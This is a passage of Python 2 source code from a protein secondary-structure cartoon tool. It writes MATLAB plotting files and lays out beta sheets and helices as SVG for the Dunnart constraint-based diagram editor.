def write_sheet_mfiles(self, pdbid, domainid):
"""
Write a MATLAB m-file for each sheet. The m-file contains
commands to plot in 3D the carbon-alpha trace of each strand
and the axis fitted to it.
Note we can't use the same convention as our .ps and .svg filenames
since MATLAB can't have '-' characters in m-file filenames,
or digits as the first character (since m-files are used as commands).
So we will have filenames that always have the domain identifier
(even if single domain), and will add the sheet id on the end,
and an M on the front
e.g. 'M1QLP1A.m' (1QLP domain 1 sheet 2).
Then you can run 'matlab -r M1QLP1A' to plot it
(or just enter M1QLP1A at the MATLAB prompt).
Parameters:
pdbid - PDB identfier
domainid - domain identifier
Return value: None
Uses member data: (readonly)
nodelist - list of nodes; NOTE however that as the fit_axis()
method is called this will compute axes and store
in PTNodeStrand nodes - when not writing m-files
only axes are computed as needed, this forces them
all to be computed.
secstruct - PTSecStruct representing the secondary structure
sheet_dict - dict of {sheet_id : ptnode_list} represneting sheets
WARNING: overwrites the output files
"""
for (sheet_id, ptnode_list) in self.sheet_dict.iteritems():
filename = 'M' + pdbid + domainid + sheet_id + '.m'
sys.stdout.write('writing file ' + filename + '\n')
fh = open(filename, 'w')
mfile_write_prelude(fh)
for node in ptnode_list:
node.fit_axis(self.pdb_struct, fh) # writes to fh itself
mfile_write_conclusion(fh)
fh.close()
def write_helix_mfiles(self, pdbid, domainid):
"""
Write a (single) MATLAB m-file for all helices. The m-file contains
commands to plot in 3D the carbon-alpha trace of each helix
and the axis fitted to it.
Note we can't use the same convention as our .ps and .svg filenames
since MATLAB can't have '-' characters in m-file filenames,
or digits as the first character (since m-files are used as commands).
So we will have filenames that always have the domain identifier
(even if single domain), and will add the sheet id on the end,
and an MH on the front
e.g. 'MH1QLP1.m' (1QLP domain 1).
Then you can run 'matlab -r MH1QLP1' to plot it
(or just enter MH1QLP1 at the MATLAB prompt).
Parameters:
pdbid - PDB identfier
domainid - domain identifier
Return value: None
Uses member data: (readonly)
nodelist - list of nodes; NOTE however that as the fit_axis()
method is called this will compute axes and store
in PTNodeHelix nodes - when not writing m-files
only axes are computed as needed, this forces them
all to be computed.
secstruct - PTSecStruct representing the secondary structure
WARNING: overwrites the output files
"""
filename = 'MH' + pdbid + domainid + '.m'
sys.stdout.write('writing file ' + filename + '\n')
fh = open(filename, 'w')
mfile_write_prelude(fh)
for node in self.iter_helices():
node.fit_axis(self.pdb_struct, fh) # writes to fh itself
mfile_write_conclusion(fh)
fh.close()
def build_dunnart_svg(self,
sse_label_scheme = 'separate',
use_connector_arrowheads=False,
heuristic_helix_placement=False,
sheet_shading_colors = None,
enable_sheet_gap_rule = False,
use_helix_clustering = False,
helix_cluster_shading_color = None,
connector_color_scheme = 'all',
color_scheme = 'none',
helix_proximity_shading_colors = None,
initial_xmlid = 1,
main_sideways = False,
main_reversed = False,
interdomain_connectors = False,
label_residue_numbers = False):
"""
Build SVG for input to the Dunnart interactive constraint-based
layout diagramming program.
http://www.csse.monash.edu.au/~mwybrow/dunnart/
Dunnart (0.14+SVN) has been modified to work with this by including
strand and helix shapes, amongst other things (by Michael Wybrow).
(Currently not generally available).
The greedy algorithm for laying out the cartoon is basically:
1. Place the largest element somewhere near the middle of canvas
2. Use the distance map to find closest element to any already
placed element
3. position that closest element relative to the chosen already
placed one, using distance/position maps and tableaux to determine
relative position and orientation
4. repeat from 2 until all elements placed
Sheets are single elements in themsleves, with the relative positioning
and layout of their strands performed by build_sheet_svg() based
on the constraints already built in build_sheet_constraints().
Parameters:
sse_label_scheme - 'none', 'sequential' or 'separate'.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
use_connector_arrowheads - If true put arrowheads on connectors
indicating sequence direction from N- to C- terminus.
Default False.
heuristic_helix_placement - instead of using the greedy algorithm
with distance matrix information for helices,
use the old heuristic algorithm to place them
aligned neatly with strands nearby in sequence.
Still use greedy distance matrix algorithm for sheets.
sheet_shading_colors - None (use default shade for all) or
'auto' (use color gradient to shade each
differently) or list of colors.
enable_sheet_gap_rule - If True and using heuristc helix
placement, don't put 'too long' helices between
neighbouring sheets.
use_helix_clustering - If True and using heuristic helix placement,
cluster sequential helices and place in cluster
with tableau and distance matrix rather than
aligning them all on strand axis.
helix_cluster_shading_color - color to shade helix clusters
connector_color_scheme - 'all','chain','domain','crossing' (see main)
color_scheme: 'none', 'simple', 'gradient', 'sheet', 'fold'
(specc. in main)
use_helix_proximity_color - if True and using helix clustering
shade nearby helix clusters the same color.
helix_proximity_shading_colors - If not None & using helix clustering,
shade nearby helix clusters the same
color: 'auto' (use color gradient
to shade each differently),
or list of colors.
initial_xmlid - Initial XML sequential identifier. Default 1.
main_sideways - if True, the 'main' part of the domain (largest sheet
or longest helix) is drawn sideways instead of vertical
main_reversed - If True, the main part (as above) is drawn reversed
(down not up, or right not left when sideways)
interdomain_connectors - If True, do NOT make pseduo-terminus nodes
at domain boundaries. Instead the domain boundary
SSEs are left ot hve connectors to other domain
added later. Default False.
label_residue_numbers - If True put start and end residue numbers
of SSE on head and tail of shape as labels
Return value: None
Uses member data: (readonly)
secstruct - PTSecStruct representing the secondary structure
sheet_strandlists_dict - the dictionary (by sheet id)
of list of lists built by
build_constraints()
ptrelpos -
PTRelativePosition instance to find relative positions
include_p_helices, include_310_helices
pdb_struct - need to get residue name/id informatino for connectors
(read/write):
sheet_cluster_list - list of SVGCluster objects for sheets
helix_cluster_list - list of SVGCluster objects for helix clusters
svg_constraint_list - list of PTSVGConstraint derived objects
svg_connector_list - list of PTSVGConnector objects
Note also uses member data in each node.
NOTE: The output file is overwritten if it exists.
Precondition: node_list is sorted (by start res seq ascending);
this is done by build_graph_from_secstruct()
before calling.
"""
# everything in the SVG will have a unique id, sequentially
self.xmlid_generator = GenSeqId(initial_xmlid)
# if using sequential numbering, we'll build this dictionary mapping
# nodeid to sequential number (note NOT restarting for each chain)
# since we will not be
# iterating through node_lists when writing the SVG, so will need
# to look up the ordinal position (sequence number) for a node.
# this is a dictionary of { nodeid : seqnum }
seqnum_dict = {}
for (seqnum, nodeid) in \
enumerate([node.nodeid for node in self.iter_nodes() if \
not ( (isinstance(node, PTNodeTerminus)) or
(isinstance(node, PTNodeHelix) and
( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) ) ) ]):
seqnum_dict[nodeid] = seqnum + 1 # start at 1 not 0
init_xpos = 300 # initial x position
init_ypos = 200 # initial y posision
xpos = init_xpos
ypos = init_ypos
self.sheet_cluster_list = [] # list of PTSVGCluster objects for sheets
self.helix_cluster_list = [] # list of PTSVGCluster for helix clusters
self.helix_cluster_dict = {} # dict { clusterid : PTSVGCluster }
self.svg_constraint_list = [] # list of PTSVGConstraint objects
self.svg_connector_list = [] # list of PTSVGConnector objects
# store y pos of sheet top and bottom
# and x pos of sheet left and right in a dictionary
# { sheet_id : (top_ypos, bottom_ypos, left_xpos, right_xpos) }
# e.g. { 'A' : (100, 120, 30, 200) }
# (note y before x for historical reasons, started with only ypos
# then extended it)
# so we can position things
# relative to them later
# TODO: should probably have a class to represent sheets with these
# values as data members rather than this dict
sheet_pos_dict = {}
# stores above,below,left,right neighbour sheet of each sheet
# TODO: maybe we should use this to avoid collisions between
# helices and helix clusters and sheets (not just between
# sheets as we do currently)
# instead of depending on Dunnart
# non-overlap constraints to fix it up when this happens?
# (Since greedy algorithm can result in elements being placed
# on top of each other).
sheet_posmap = PTPosMap()
num_sheets = len(self.sheet_dict)
num_helices = self.get_num_helices()
# We'll make two sets: one for all the elements (sheets, helices)
# not yet positioned, and one for those that have been positioned.
# members of these sets are either PTNodeHelix for a helix or
# sheet id ('A' etc.) for a sheet.
# We also need a third set of elements to exclude from placement,
# namely 310 and/or pi helices if we don't want to draw them.
# (These will not be in unpositioned element (handled by iter_helices())
# but we need a set to explicitly tell find_nearest_to_any_in_set()
# to not return them).
positioned_elements = Set()
exclude_elements = Set()
if heuristic_helix_placement:
# only position sheets, helices placed later
unpositioned_elements = Set(list(self.sheet_dict.keys()))
else:
unpositioned_elements = Set(list(self.iter_helices()) +
list(self.sheet_dict.keys()))
for node in self.iter_nodes():
if ( isinstance(node, PTNodeHelix) and
((node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) ):
exclude_elements.add(node.nodeid) #note: nodeid not node
total_elements = len(unpositioned_elements)
# get the largest element, to place first. It will be a sheet,
# and if no sheets (alpha-only domain), the largest helix
largest_sheet_id = self.largest_sheet()
if largest_sheet_id != None:
if main_sideways:
if verbose:
sys.stderr.write('largest sheet ' + largest_sheet_id +
' is sideways\n')
self.ptrelpos.set_all_sheet_strands_sideways(largest_sheet_id)
if main_reversed:
if verbose:
sys.stderr.write('largest sheet ' + largest_sheet_id +
' is reversed\n')
self.ptrelpos.flip_all_strands_in_sheet(largest_sheet_id)
self.build_sheet_svg(sheet_pos_dict,
sse_label_scheme, seqnum_dict,
largest_sheet_id,
xpos, ypos, label_residue_numbers)
unpositioned_elements.remove(largest_sheet_id)
positioned_elements.add(largest_sheet_id)
elif not heuristic_helix_placement:
# no sheets, place largest helix first
helix = self.largest_helix()
helix.set_sideways(main_sideways)
helix.set_reversed(main_reversed)
self.set_helix_svginfo(helix, xpos, ypos,
sse_label_scheme, seqnum_dict,
label_residue_numbers)
unpositioned_elements.remove(helix)
positioned_elements.add(helix)
while len(unpositioned_elements) > 0:
assert(len(unpositioned_elements) +
len(positioned_elements) == total_elements)
assert(len(unpositioned_elements & positioned_elements) == 0)
# find nearest element to any already positioned element
(positioned_element, cur_element) = \
self.find_nearest_to_any_in_set(positioned_elements,
exclude_elements,
heuristic_helix_placement)
if verbose:
sys.stderr.write('positioning ' + str(cur_element) +
' relative to ' +
str(positioned_element) + '\n')
# position the element near its closest already positioned one
# according to position map for relative position and tableau
# for orientation
(relpos, pos_strand, cur_strand) = \
self.ptrelpos.get_relative_position(positioned_element,
cur_element)
(xpos, ypos) = self.relpos_to_pos(positioned_element,
cur_element,
relpos,
pos_strand, cur_strand,
sheet_pos_dict)
if isinstance(cur_element, PTNodeHelix):
self.set_helix_svginfo(cur_element,
xpos, ypos,
sse_label_scheme,
seqnum_dict,
label_residue_numbers)
else:
if not isinstance(positioned_element, PTNodeHelix):
# positioned element is a sheet. Avoid collisions with
# already placed sheets by checking in posmap and
# positioning relative to the thing we would have collided
# with instead.
if sheet_posmap.has_key(positioned_element):
sheet_neighbours = sheet_posmap[positioned_element]
neighbour = sheet_neighbours.get_neighbour(relpos)
if neighbour != None:
if verbose:
sys.stderr.write(" sheet positioning: "
"can't place " +
cur_element + ' ' +
ptrelpos_to_str(relpos) + ' ' +
'sheet ' + positioned_element +
' (occupied by ' +
neighbour +
')\n')
positioned_element = neighbour
if verbose:
sys.stderr.write(' positioning ' +
str(cur_element) +
' relative to ' +
str(positioned_element) +
' instead\n')
(relpos, pos_strand, cur_strand) = \
self.ptrelpos.get_relative_position(positioned_element,
cur_element)
(xpos, ypos) = self.relpos_to_pos(positioned_element,
cur_element,
relpos,
pos_strand, cur_strand,
sheet_pos_dict)
sheet_neighbours = sheet_posmap[positioned_element]
neighbour = sheet_neighbours.get_neighbour(relpos)
if neighbour != None:
# note there is cut&paste code
# here from further up (before if isinstance...)
# And sometimes (e.g. 2QP2-1, the case this is
# intended originally to fix), we get a collision
# on the new positioned_element as well.
# So we could then use an arbtirary position
# (but what if none?) Don't want an lot of
# cut&paste trying.. maybe should loop from
# closest to furthest SSEs from the test element
# and place in relpos to one where the relpos
# neighbour slot is vacant.
# FIXME: arbitrary sheet positioning here
if (sheet_neighbours.west == None):
relpos = RELPOS_LEFT
elif (sheet_neighbours.east == None):
relpos = RELPOS_RIGHT
elif (sheet_neighbours.north == None):
relpos = RELPOS_ABOVE
elif (sheet_neighbours.south == None):
relpos = RELPOS_BELOW
else:
sys.stderr.write('WARNING: nowhere to place ' +
cur_element +
' relative to sheet '
+ positioned_element +
'\n')
if verbose:
sys.stderr.write(' (collision): ' +
'positioning sheet ' +
cur_element + ' ' +
ptrelpos_to_str(relpos) +
' sheet ' +
positioned_element +
'\n')
(xpos, ypos) = self.relpos_to_pos(positioned_element,
cur_element,
relpos,
pos_strand, cur_strand,
sheet_pos_dict)
sheet_posmap.add_neighbour_obj(positioned_element, cur_element,
relpos)
self.build_sheet_svg(sheet_pos_dict,
sse_label_scheme, seqnum_dict,
cur_element,
xpos, ypos, label_residue_numbers)
# for strands that are both vert or both horiz and used as
# closest elements in sheets, constrain them to be aligned
# on their indguides, if they are above/below when vert
# or left/right when horiz.
# NOTE for -i option (helix placement using
# dist matrix) pos_strand may actually be a helix,
# so won't have an indguide). TODO: align on helix?
if ( isinstance(pos_strand, PTNodeStrand) and
cur_strand.get_sideways() == pos_strand.get_sideways() and
((not cur_strand.get_sideways() and
(relpos == RELPOS_ABOVE or relpos == RELPOS_BELOW)) or
(cur_strand.get_sideways() and
(relpos == RELPOS_LEFT or relpos == RELPOS_RIGHT))) ):
assert(pos_strand.indguide != None)
if cur_strand.get_sideways():
align_type = DUNNART_ALIGN_MIDDLE
else:
align_type = DUNNART_ALIGN_CENTER
self.svg_constraint_list.append(
PTSVGAlignmentConstraint(pos_strand.indguide,
cur_strand,
align_type))
unpositioned_elements.remove(cur_element)
positioned_elements.add(cur_element)
# END of iteration over unpositioned_elements set
assert(len(positioned_elements) == total_elements)
if heuristic_helix_placement:
# first position any helices that meet the special case of
# being between two strands on same axis (i.e. in vertlist)
# in sheet
self.build_interstrand_helices_svg(sheet_pos_dict,
sse_label_scheme,
seqnum_dict,
label_residue_numbers)
# now position all other helices on axis of nearby strand,
# on elsewhere according to heuristics
self.build_helices_svg(sheet_pos_dict,
sse_label_scheme, seqnum_dict,
sheet_posmap, enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
color_scheme,
interdomain_connectors,
label_residue_numbers)
if use_helix_clustering:
# if using helix clustering, color nearby helix clusters
# the same shading color. Note that this may involve
# making some helices a one-helix 'cluster'.
if helix_proximity_shading_colors:
self.set_helix_cluster_colors(helix_proximity_shading_colors,
helix_cluster_shading_color)
# color the helices in clusters according to the color
# list if such is specified using 'simple' color scheme
if color_scheme[:6] == 'simple':
type_color_dict = get_simple_colors(color_scheme)
if type_color_dict.has_key('helixcluster'):
helixcluster_color_list = type_color_dict['helixcluster']
else:
helixcluster_color_list = [DEFAULT_SHAPE_COLOR_HEXSTR]
helix_cluster_i = 0
for helix_cluster in self.helix_cluster_list:
for helix in helix_cluster.svgnodelist:
helix.set_color_hex(helixcluster_color_list[
helix_cluster_i % len(helixcluster_color_list)])
helix_cluster_i += 1
# and build all the connectors
chain_i = 0
for nodelist in self.iter_chains():
self.build_connectors_aligned_svg(nodelist,
chain_i,
use_connector_arrowheads,
connector_color_scheme,
interdomain_connectors)
chain_i += 1
else:
# build termini
self.build_termini_svg(interdomain_connectors)
# build connectors
chain_i = 0
for nodelist in self.iter_chains():
self.build_connectors_svg(
nodelist,
chain_i,
use_connector_arrowheads,
connector_color_scheme,
interdomain_connectors)
chain_i += 1
# build lists of residue names and ids in connectors
for connector in self.svg_connector_list:
connector.build_resname_sequence(self.residue_list,
self.pdb_resid_dict)
# build sheet clusters
self.build_sheet_cluster_constraints_svg(sheet_shading_colors)
def relpos_to_pos(self, reference_element, new_element, relpos,
ref_strand, new_strand,
sheet_pos_dict):
"""
Given a reference element and an element to place, and its position
relative to the reference element, return the absolute x and y
co-orindates to place the new element. Uses the information from
the nodes and the sheet_pos_dict to find the x and y
co-ordinates of the reference element
Parameters:
reference_element - sheet id or PTNodeHelix of the element
used as reference
new_element - sheet id or PTNodeHelix of elmenet to place
relpos - position to place new_element relative to
reference_element. ptrelpos.RELPOS_ABOVE, etc.
ref_strand - strand in reference element it is relative to
or None if not a sheet
new_strand - strand in new element used for relative
position or None if not a sheet
{ nodeid : (shape_xmlid, xpos, ypos, indguide_xmlid) }
sheet_pos_dict - y pos of sheet top and bottom
and x pos of sheet left and right
{ sheet_id : (top_y, bot_y, left_x, right_x) }
Uses data members:
sheet_strandlists_dict -
dictionary of { sheet_id : list of list of nodes }
where the list of list of nodes is
described in build_sheet_constraints()
ptrelpos -
PTRelativePosition instance to find relative
positions of elements
Return value:
tuple (xpos, ypos) of position to place new_element
"""
if isinstance(reference_element, PTNodeHelix):
left_x = reference_element.xpos
right_x = left_x
if reference_element.get_sideways():
right_x += reference_element.get_span() * \
DUNNART_HELIX_SPAN_FACTOR
else:
right_x += DUNNART_HELIX_WIDTH
top_y = reference_element.ypos
if reference_element.get_sideways():
bot_y = top_y + DUNNART_HELIX_WIDTH
else:
bot_y = top_y + (reference_element.get_span() *
DUNNART_HELIX_SPAN_FACTOR)
else:
# is a sheet id
assert(isinstance(ref_strand, PTNodeStrand))
left_x = sheet_pos_dict[reference_element][2]
right_x = sheet_pos_dict[reference_element][3]
top_y = sheet_pos_dict[reference_element][0]
bot_y = sheet_pos_dict[reference_element][1]
if relpos == RELPOS_ABOVE or relpos == RELPOS_BELOW:
if isinstance(new_element, PTNodeHelix):
assert(new_strand == None)
if ref_strand != None: # position helix relative to sheet
xpos = ref_strand.xpos
if relpos == RELPOS_ABOVE:
if not (ref_strand.get_sideways() or
new_element.get_sideways()):
ypos = top_y - get_min_gap_size() - \
new_element.get_span() * \
DUNNART_HELIX_SPAN_FACTOR
else:
ypos = top_y - get_min_gap_size()
else:
ypos = bot_y + get_min_gap_size()
else: # position helix relative to helix
xpos = left_x
if relpos == RELPOS_ABOVE:
if (not reference_element.get_sideways() or
new_element.get_sideways()):
ypos = top_y - get_min_gap_size() - \
new_element.get_span() * \
DUNNART_HELIX_SPAN_FACTOR
else:
ypos = top_y - get_min_gap_size()
else:
ypos = bot_y + get_min_gap_size()
else:
# new element is a sheet
assert(new_strand != None)
new_strand_posnum = \
self.ptrelpos.get_strand_posnum(new_strand)
if (ref_strand != None and
isinstance(ref_strand, PTNodeStrand)):
# position sheet relative to sheet
# need to align ref_strand and new_strand on vert axis
# so xpos (which is pos of leftmost strand in sheet)
# is difference between dist of ref strand from leftmost
# in ref sheet and dist of new strand from leftmost in
# new sheet
ref_strand_posnum = \
self.ptrelpos.get_strand_posnum(ref_strand)
offset = ref_strand_posnum - new_strand_posnum
offset *= get_strand_separation()
xpos = left_x + offset
SHEET_GAP_FUDGE_FACTOR = 2.5 # see FIXME just below
if relpos == RELPOS_ABOVE:
# new_sheet_height = self.get_longest_strand_length(
# self.sheet_strandlists_dict[new_element])
# ypos = top_y - new_sheet_height - \
# get_min_gap_size()
# FIXME really need to 'draw' (build) sheet first
# so we can get the height, since strand offsets
# mean it need bear no relation to the longest strand
# length, for now just something arbitrary
ypos = int(top_y - DUNNART_SHEET_GAP_SIZE * SHEET_GAP_FUDGE_FACTOR)
else:
ypos = int(bot_y + DUNNART_SHEET_GAP_SIZE * SHEET_GAP_FUDGE_FACTOR)
else:
# we are positioning sheet relative to a helix
# align the correct strand on the helix vertical axis
offset = new_strand_posnum * get_strand_separation()
xpos = left_x
if relpos == RELPOS_ABOVE:
ypos = top_y - DUNNART_SHEET_GAP_SIZE
if not new_strand.get_sideways():
ypos -= new_strand.get_span() * \
DUNNART_HELIX_SPAN_FACTOR
else:
ypos = bot_y + DUNNART_SHEET_GAP_SIZE
else:
assert(relpos == RELPOS_LEFT or relpos == RELPOS_RIGHT)
ypos = top_y
if isinstance(new_element, PTNodeHelix):
assert(new_strand == None)
# positioning a helix next to a sheet or helix
if relpos == RELPOS_LEFT:
if new_element.get_sideways():
xpos = left_x - get_min_gap_size() - \
new_element.get_span() * \
DUNNART_HELIX_SPAN_FACTOR
else:
xpos = left_x - get_min_gap_size()
else:
xpos = right_x + get_min_gap_size()
else:
# new element is a sheet
assert(new_strand != None)
if ref_strand != None: # positioning a sheet next to a sheet
if relpos == RELPOS_LEFT:
# first compute width of new sheet
new_sheet_left_strand = \
self.sheet_strandlists_dict[new_element][0][0]
new_sheet_right_strand = \
self.sheet_strandlists_dict[new_element][-1][0]
new_sheet_width = \
len(self.sheet_strandlists_dict[new_element]) * \
(DUNNART_STRAND_WIDTH + \
get_strand_separation())
# and position it starting that far to left of ref sheet
xpos = left_x-DUNNART_SHEET_GAP_SIZE-new_sheet_width
else:
xpos = right_x + DUNNART_SHEET_GAP_SIZE
else: # positioning a sheet next to a helix
if relpos == RELPOS_LEFT:
xpos = left_x - get_min_gap_size()
else:
xpos = right_x + get_min_gap_size()
return (xpos, ypos)
def find_nearest_to_any_in_set(self, element_set, exclude_set,
sheets_only=False):
"""
Find the nearest element (helix or sheet) to any of the elements
in the supplied set, that is not itself in this set, or in the
exclude_set. This is
so we find the nearest element to an already positioned element,
that is not itself already positioned.
Uses the PTDistMatrix to do this.
Parameters:
element_set - set of PTNodeHelixs and sheet ids to find the nearest
element to any of them, that is not itself in this set.
exclude_set - set of elements (PTNodeHelix obj or set id) to
exclude from finding (in addition to those already
in the element_set)
sheets_only - (Default False) only find sheets, not helices.
Uses data members (read):
distmatrix - The PTDistMatrix that has been built already
Return value:
tuple (set_element, close_element)
where set_element is an element in the supplied set and
close_element is the
PTNodeHelix or sheet id of the element which has minimum distance
to set_element, and this is the minimum distance between any
element in the element_set and any other element in the dist matrix.
"""
min_dist = float("inf")
min_dist_objid = None
set_element = None
# convert element (PTNodeHelix/sheet id) set to set of objids where
# the objid is the sheet id e.g. 'A' or helix id e.g. 'HELIX_A_10'
# FIXME: seems I got myself into a needless mess here with using
# string ids consistently in PTDistMatrix but mixing PTNodeHelix and
# sheet id here, necessitating this converion, should make it
# consistent.
element_objid_set = Set()
for element in element_set:
if isinstance(element, PTNodeHelix):
objid = element.nodeid
else:
objid = element # sheet id
element_objid_set.add(objid)
for objid in element_objid_set:
(close_objid, dist) = \
self.distmatrix.get_min_distance_objid(
objid, element_objid_set.union(exclude_set), sheets_only )
if dist < min_dist:
min_dist = dist
set_element_objid = objid
min_dist_objid = close_objid
# print 'xxx',min_dist_objid,set_element_objid,dist
# TODO: this whole objid ('A' for sheet 'HELIX_A_10' for helix etc.) is
# pretty dodgy (see ptdistmatrix.py also), but as we ensure
# sheet ids and helix ids are not overlapping it works
# Should really by using classes or something.
# Also sometimes I am using (as here) my id strings as indices for
# dictionaries etc. and sometimes using actual object i.e. PTNode
# etc... not very consistent.
if len(min_dist_objid) == 1: # sheet ids are 1 char long, helix ids aren't
close_element = min_dist_objid # just the sheet id
else:
close_element = self.get_node_by_id(min_dist_objid)
if len(set_element_objid) == 1:
set_element = set_element_objid
else:
set_element = self.get_node_by_id(set_element_objid)
return (set_element, close_element)
def aligned_strands_overlap(self, vert_list):
"""
Return True iff the strands in the vert list (ie strands that
are aligned on one axis) would overlap if aligned on the axis
according to their offsets relative to neighbour strands
(according to H bond patterns).
Normally this doesn't happen, and in fact one of the criteria
used to decide to put two strands on opposite sides of their common
neighbour strand (rather than the same side, see
ptnode.py has_strand_extent_overlap(), label_strand_bridge_sides())
is this very criterion. It can, however happen sometimes when
both alternatives result in overlap and geometric (dihedral angle)
criteria are used to make the side decision. In such cases this
function returns True and we then disable the offset alignment
constraints so overlap can be resolved.
Parameters:
vert_list - list of PTNodeStrand that are aligned on an axis
Return value:
True if there would be overlap of strands if the strands are
aligned on their common axis according to their H bonds to
neighbours (offsets already set in PTNodeStrand by
build_sheet_constraints(), acessed by get_align_pos()).
"""
# Note we insist not only on no actual overlap but on a minimum
# gap of this amount (in residues, so actual position is this
# multiplied by DUNNART_SPAN_LENGTH_FACTOR), since Dunnart will
# mark an overlap constraint if they are even too close.
MIN_GAP = 1
if len(vert_list) < 2:
return False
for i in range(len(vert_list)):
for j in range(i+1, len(vert_list)):
strand1 = vert_list[i]
strand2 = vert_list[j]
if strand1.get_align_pos() < strand2.get_align_pos():
min_offset_strand = strand1
other_strand = strand2
else:
min_offset_strand = strand2
other_strand = strand1
if (min_offset_strand.get_align_pos() +
min_offset_strand.get_span() +
MIN_GAP > other_strand.get_align_pos()):
sys.stderr.write('WARNING: disabled offset constraint '
'due to overlap of strands: ' +
str(min_offset_strand) + ', ' +
str(other_strand) +
'\n')
return True
def build_sheet_svg(self, sheet_pos_dict,
sse_label_scheme, seqnum_dict,
sheet_id,
xpos, ypos,
label_residue_numbers):
"""
build SVG for a sheet, with strands in left to right order
according to the constraints previuosly calculated, including
parallel/antiparallel relationship between strands (drawn
as up/down arrows, same direction for parallel).
Also write indguides and their alignments, and distributions.
Each strand has a vertical indguide
use to align vertically (required for multiple strands on
same vertical axis) and these are also used for the
distribution constraints (to keep uniform separation between
strands in a sheet).
Parameters:
sheet_pos_dict - (in/out)
dictionary mapping from sheet id to top and
bottom of sheet y co-ordinate and left
and right x co-orindate:
{ sheet_id : (top_ypos, bottom_ypos,
left_xpos,right_xpos) }
sse_label_scheme - 'none','sequential' or 'separate'.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'
sheet_id - id of the sheet
xpos - x position to start sheet
ypos - y position to start sheet
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Uses data members (readonly):
node_list - ordered list of nodes
ptrelpos -
PTRelativePosition instance to find relative
positions of elements
xmlid_generator
(write):
svg_constraint_list
Return value:
None
"""
start_xpos = xpos
start_ypos = ypos
horiz_order_list = self.sheet_strandlists_dict[sheet_id]
prev_vert_list = None
# NOTE: horiz/vert and x/y and height/width, top/bot
# names may be somewhat confusing in
# here now since sideways strands reverse the meanings of these
# things... (i.e. height is actually width, 'horiz_indguides' are
# vertical, etc. variable names and comments assume up/down
# (i.e. not sideways)
if horiz_order_list[0][0].get_sideways(): # if one strand is, all are
sheet_is_sideways = True
else:
sheet_is_sideways = False
# keep track of bottom and top of sheet so we can set sheet_pos_dict
if sheet_is_sideways:
top_pos = start_xpos
bot_pos = start_xpos
else:
top_pos = start_ypos
bot_pos = start_ypos
# FIXME: shouldn't use this longest_strand_length stuff anymore,
# need to take account of strand offsets etc. (see below too)
(unused_longest_strand, longest_strand_length) = \
self.ptrelpos.get_longest_strand(horiz_order_list)
longest_strand_length *= DUNNART_SPAN_LENGTH_FACTOR
distribution_xmlid = None
if len(horiz_order_list) > 1: #shouldn't get 1 strand sheets, but do
# write distribution for separation constraints between strands
# position it just below the bottom horizontal indguide of sheet
if sheet_is_sideways:
direction = DUNNART_GUIDE_TYPE_HORI
distr_pos = xpos + longest_strand_length + 10
else:
direction = DUNNART_GUIDE_TYPE_VERT
distr_pos = ypos + longest_strand_length + 10
xmlid = self.xmlid_generator.next()
distribution = PTSVGDistribution(xmlid, direction,
get_strand_separation(),
distr_pos)
self.svg_constraint_list.append(distribution)
strand_num = 0
for horiz_list_index in range(len(horiz_order_list)):
vert_list = horiz_order_list[horiz_list_index]
# write vertical indguide for strand(s) at this horizontal pos
if sheet_is_sideways:
direction = DUNNART_GUIDE_TYPE_HORI
pos = ypos
else:
direction = DUNNART_GUIDE_TYPE_VERT
pos = xpos
xmlid = self.xmlid_generator.next()
vert_indguide = PTSVGIndGuide(xmlid, pos, direction)
self.svg_constraint_list.append(vert_indguide)
# write a distribution constraint for this strand(s) in
# a single vertical alignment
# (relative to neighbour vertical alignment in horiz list)
# note distribution constraints are to the strands'
# corresponding vertical indguides, not strands themselves
if strand_num > 0:
self.svg_constraint_list.append(
PTSVGDistroConstraint(prev_vertlist_indguide,
vert_indguide,
distribution))
else:
# for the first strand, write a horizontal indguide to
# be used for separation constraints which enforce the
# vertical offset of subsequent strands relative to the
# first one, that was computed earlier
# (in build_sheet_constraints())
if sheet_is_sideways:
direction = DUNNART_GUIDE_TYPE_VERT
pos = xpos
else:
direction = DUNNART_GUIDE_TYPE_HORI
pos = ypos
xmlid = self.xmlid_generator.next()
first_horiz_indguide = PTSVGIndGuide(xmlid, pos, direction)
self.svg_constraint_list.append(first_horiz_indguide)
if sheet_is_sideways:
sheet_start_pos = start_ypos
else:
sheet_start_pos = start_xpos
# disable strand 'vertical' alignment offset constraints if
# there would be overlap of strand shapes on the indguide
# which would result in an unsatisfiable constraint in Dunnart
# since we also set non-overlap constraint on.
enable_offset_constraint = True
if len(vert_list) > 1 and self.aligned_strands_overlap(vert_list):
enable_offset_constraint = False
for node in vert_list:
pos = self.build_strand_svg(node,
vert_indguide,
first_horiz_indguide,
xpos, ypos,
sse_label_scheme,
seqnum_dict,
strand_num,
sheet_start_pos,
enable_offset_constraint,
label_residue_numbers)
if pos < top_pos:
top_pos = pos
if pos + node.get_span() * DUNNART_SPAN_LENGTH_FACTOR \
> bot_pos:
bot_pos = pos + \
node.get_span() * DUNNART_SPAN_LENGTH_FACTOR
strand_num += 1
if sheet_is_sideways:
ypos += get_strand_separation()
else:
xpos += get_strand_separation()
prev_vert_list = vert_list
prev_vertlist_indguide = vert_indguide
if sheet_is_sideways:
sheet_pos_dict[sheet_id] = (start_ypos, ypos,
top_pos, bot_pos)
else:
sheet_pos_dict[sheet_id] = (top_pos, bot_pos,
start_xpos, xpos)
def build_strand_svg(self, node, vert_indguide,
first_horiz_indguide,
xpos, ypos,
sse_label_scheme,
seqnum_dict,
strand_num,
sheet_start_pos,
enable_offset_align_constraint,
label_residue_numbers):
"""
Function used by build_sheet_svg() to build the SVG XML
for a single strand. This consists of the actual strand shape
along with alignment constraints.
Parameters:
node - node to write strand for
vert_indguide - vertical indguide for this strand
first_horiz_indguide - horizontal indguide
of the first strand in the sheet, which
is used as the base for all separation
constraints enforcing offset of strands
along y axis (on vert indguide)
xpos - current X position
ypos - current Y position
se_label_scheme - 'none','sequential' or 'separate'.
if 'sequential' number all nodes in one sequence
instead of sepearte sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'.
